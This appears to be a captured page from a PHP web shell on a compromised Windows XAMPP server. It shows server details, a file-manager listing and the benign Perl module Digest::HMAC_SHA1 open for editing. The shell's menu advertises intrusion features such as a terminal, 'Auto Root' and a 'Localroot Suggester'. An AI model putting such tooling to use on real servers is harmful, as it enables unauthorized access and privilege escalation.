Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
perl /
vendor /
lib /
Digest /
Delete
Unzip
Name
Size
Permission
Date
Action
OMAC
[ DIR ]
drwxrwxrwx
2024-07-26 17:39
Perl
[ DIR ]
drwxrwxrwx
2024-07-26 17:39
CMAC.pm
3.13
KB
-rw-rw-rw-
2008-06-01 20:41
HMAC.pm
2.82
KB
-rw-rw-rw-
2011-07-25 20:51
HMAC_MD5.pm
1.09
KB
-rw-rw-rw-
2009-03-06 15:52
HMAC_SHA1.pm
1.14
KB
-rw-rw-rw-
2011-07-25 20:51
MD2.pm
1.33
KB
-rw-rw-rw-
2014-04-28 23:36
OMAC1.pm
447
B
-rw-rw-rw-
2008-06-01 20:40
OMAC2.pm
1.25
KB
-rw-rw-rw-
2008-06-01 20:21
SHA1.pm
6.92
KB
-rw-rw-rw-
2010-07-03 17:20
Whirlpool.pm
3.23
KB
-rw-rw-rw-
2014-12-01 23:08
Save
Rename
package Digest::HMAC_SHA1; $VERSION="1.03"; use strict; use Digest::SHA qw(sha1); use Digest::HMAC qw(hmac); # OO interface use vars qw(@ISA); @ISA=qw(Digest::HMAC); sub new { my $class = shift; $class->SUPER::new($_[0], "Digest::SHA", 64); # Digest::SHA defaults to SHA-1 } # Functional interface require Exporter; *import = \&Exporter::import; use vars qw(@EXPORT_OK); @EXPORT_OK=qw(hmac_sha1 hmac_sha1_hex); sub hmac_sha1 { hmac($_[0], $_[1], \&sha1, 64); } sub hmac_sha1_hex { unpack("H*", &hmac_sha1) } 1; __END__ =head1 NAME Digest::HMAC_SHA1 - Keyed-Hashing for Message Authentication =head1 SYNOPSIS # Functional style use Digest::HMAC_SHA1 qw(hmac_sha1 hmac_sha1_hex); $digest = hmac_sha1($data, $key); print hmac_sha1_hex($data, $key); # OO style use Digest::HMAC_SHA1; $hmac = Digest::HMAC_SHA1->new($key); $hmac->add($data); $hmac->addfile(*FILE); $digest = $hmac->digest; $digest = $hmac->hexdigest; $digest = $hmac->b64digest; =head1 DESCRIPTION This module provide HMAC-SHA-1 hashing. =head1 SEE ALSO L<Digest::HMAC>, L<Digest::SHA>, L<Digest::HMAC_MD5> =head1 AUTHOR Gisle Aas <gisle@aas.no> =cut